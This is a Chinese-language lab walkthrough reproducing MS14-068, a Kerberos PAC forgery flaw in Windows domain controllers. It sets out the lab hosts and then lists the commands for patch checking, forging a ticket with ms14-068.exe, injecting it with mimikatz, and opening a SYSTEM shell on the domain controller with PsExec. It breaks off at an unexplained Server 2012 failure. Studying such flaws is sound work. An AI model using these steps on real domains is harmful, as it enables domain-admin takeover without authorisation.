MS14-068（域提权）漏洞复现

这里便用到了我们之前所讲到的 PAC 这个东西，PAC 是用来验证 Client 的访问权限的，它会被TGT 里发送给 Client，然后由 Client 发送给 TGS。但也恰恰是这个 PAC 造成了 MS14-068 这个漏洞。
该漏洞是位于 kdcsvc.dll 域控制器的密钥分发中心（KDC）服务中的 Windows 漏洞，它允许经过身份验证的用户在其获得的票证 TGT 中插入任意的 PAC 。普通用户可以通过呈现具有改变了 PAC 的 TGT 来伪造票据获得管理员权限

该漏洞在windows server2012环境的域控中可能会发生报错

环境信息

windows server2008 R2（域控）：192.168.197.4
windows 7（成员机）：192.168.197.133

查看本地主机信息

使用域内主机域内普通用户登录

net config workstation

查看域管主机信息

nltest /dsgetdc:

查看本地是否打补丁

systeminfo |find "3011780"

返回空证明没打补丁

本地访问测试

dir \\WIN-S50F8HMOEBD.dc1.com\c$

查看用户信息

whoami -user

使用ms14-068伪造票据：

ms14-068.exe -u [email protected] -p 123 -s S-1-5-21-3698873215-1888486255-1844816113-1107 -d WIN-S50F8HMOEBD.dc1.com

ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员 sid -d 域控制器地址

生成对应文件

使用mimikatz来清除和写入凭证

kerberos::purge			//清除凭证
kerberos::ptc  票据地址

再次链接后不会拒绝

dir \\WIN-S50F8HMOEBD.dc1.com\c$

反弹shell

PsExec64.exe /accepteula /s \\WIN-S50F8HMOEBD.dc1.com cmd

系统权限

域管IP

当域控是windows server2012时

会有以下拦截，不知道是什么情况